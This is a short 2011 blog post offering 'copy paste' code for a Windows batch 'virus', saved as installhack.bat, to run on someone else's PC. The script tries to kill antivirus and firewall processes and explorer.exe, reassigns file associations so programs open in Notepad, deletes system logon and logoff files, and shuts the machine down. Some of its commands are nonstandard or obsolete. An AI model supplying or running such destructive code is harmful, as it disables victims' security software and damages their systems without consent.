Saturday 16 July 2011

Easy way to create Virus-copy paste code

If u want to make some one's pc like this

1.
Ends Process, NAVAPSVC.exe
2.
Ends Process, Explorer.exe (taskbar and icons will dissapear)
3.
Ends Process, zonelabs.exe
4.
associate a exe file with txt (when opening exe files, it will go to notepad)
5.
associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6.
Deletes Login/Logoff Screens

Just Copy
This Below code In Notepad, Save as installhack.bat and you are done!

<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>


title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown


No comments:

Post a Comment